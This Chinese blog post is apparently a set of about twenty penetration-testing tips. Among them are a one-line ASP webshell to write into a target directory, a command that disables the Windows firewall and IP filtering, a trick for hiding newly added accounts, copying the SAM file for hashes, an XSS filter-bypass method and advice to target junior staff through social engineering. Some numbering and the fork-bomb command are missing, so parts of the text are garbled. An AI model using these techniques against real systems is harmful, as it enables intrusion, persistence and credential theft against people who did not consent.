【渗透笔记】(叁)

我们新开的栏目:【学习笔记】旨在与小伙伴们分享小编们的学习心得,渗透测试笔记连载由91ri网络安全研究室的小编们带来,主要为一些短小但又精华的渗透小技巧,这些技巧都是由小编们在平时读书、学习的时候积累的一些小技巧,初定为每周更新一次。为保证质量,每一篇为20条左右的渗透小记。同时欢迎其他同学们投稿给我们你的笔记与大家分享~

 

1、提权简单归纳一下,可以分为系统设置与第三方软件缺陷提权、溢出提权、社会工程学提权。

 

2、asp webshell想要执行cmd命令,需要具备一起其中任一个组件:wscript.shell、wscript.shell1、shell applition、shell applition1

 

3、有时候添加账号没成功可能是服务器的强密码策略(万恶的2008),改个超强度的密码再往死里整吧。

 

4、有时候能够添加用户,但是不能添加管理员组,这时候考虑是不是管理员组被改名了。可以利用net user administrator查看管理员所属的组来确定名称。

 

5、添加账号一个小小技巧,妙用无限:在添加账号时,将账号名设为“ ”(引号里的字符为搜狗拼音打v+1时候的d项),不懂什么意思,net user一下你就知道这个淫荡的技巧了。

 

缺陷参数:str

过滤规则够BT 但是同样能绕!

会把提交的编码 给解码 然后再插入到网页中!然后再对网页内的值进行检查 过滤!

首先%26%23会被还原成 &#  于是变成了: b 于是被还原成:b
b插入到页面 再检查 b+ase64  = base64 满足规则  于是又过滤成 base64  绕过失败!

但是如果b的html十进制编码 再多加几个000  便不会被他给解码  但是在浏览器中又会被解码 于是便可以这样绕过!

——摘自《XSS神器]XssEncode chrome插件 – 0x_Jin》

8、泪滴攻击是拒绝服务攻击的一种。 泪滴是一个特殊构造的应用程序,通过发送伪造的相互重叠的IP分组数据包,使其难以被接收主机重新组合。他们通常会导致目标主机内核失措 。 泪滴攻击利用IP分组数据包重叠造成TCP/ IP分片重组代码不能恰当处理IP包。影响的系统有Windows 3.1、Windows 95和NT、2.0.32和2.1.63版本以下的Linux。

 

9、当防火墙被放置在外网边界,一般不会开启IDS功能,外网的攻击比较多,也比较复杂,开启IDS可能导致防火墙的性能出现问题。一般来说,当防火墙处于信息中心边界时,可以开启IDS;而在外网边界可以使用专门的IDS或IPS设备。

 

10、Nessus是一个强大的扫描器,强大到它甚至拥有属于自己的脚本语言,称为Attack Scripting Language(NASL)。

 

 11、得到目标站目录, 不能直接跨的 。 可以通过” echo ^<%execute(request(“cmd”))%^> >>X:目标目录 X.asp “或者 “copy 脚本文件 X:目标目录X.asp”像目标目录写入 webshell,或者还可以试试 type 命令。

 

12、在win下关闭防火墙 和 TCP/IP 筛选的命令:net stop policyagent & net stop sharedaccess

 

13、当  GetHashes  获取不到  hash  时,可以用冰刃(IceSword)把  sam  复制到桌面(适用于Windows 2000/XP/2003/Vista操作系统)。

14、一般来说,中文编码使用big5时,在写入某些数据库系统中,在“许、盖、功”这些字体上面会发生错误。

 

15、 

——Linux fork炸弹,其防范的方法是使用命令“ulimit -u 200”来限制每个用户可以使用的最大进程数量。

 

16、标准ACL ,  所谓标准,就是指依照标准IP协议进行过滤,而且只对数据包的源IP地址进行控制。所以,标准ACL的应用要尽量靠近目的IP。

 

17、扩展ACL应该靠近特征数据的源地址所在端口,这样可以将被阻止的数据尽快地组织在不需传递它的网络外面。

 

 18、渗透一定意义上是人与人的较量,所以呢,如果你现在月薪5000那么去黑掉一个大家伙的时候应该从月薪2000的地方入手,譬如前台,运营,客服,hr,公关之类的为佳,找程序的入口也应该找实习生开发的,找外包的……      ——by wooyun@xsser
本文为学习笔记,作者为91ri.org团队。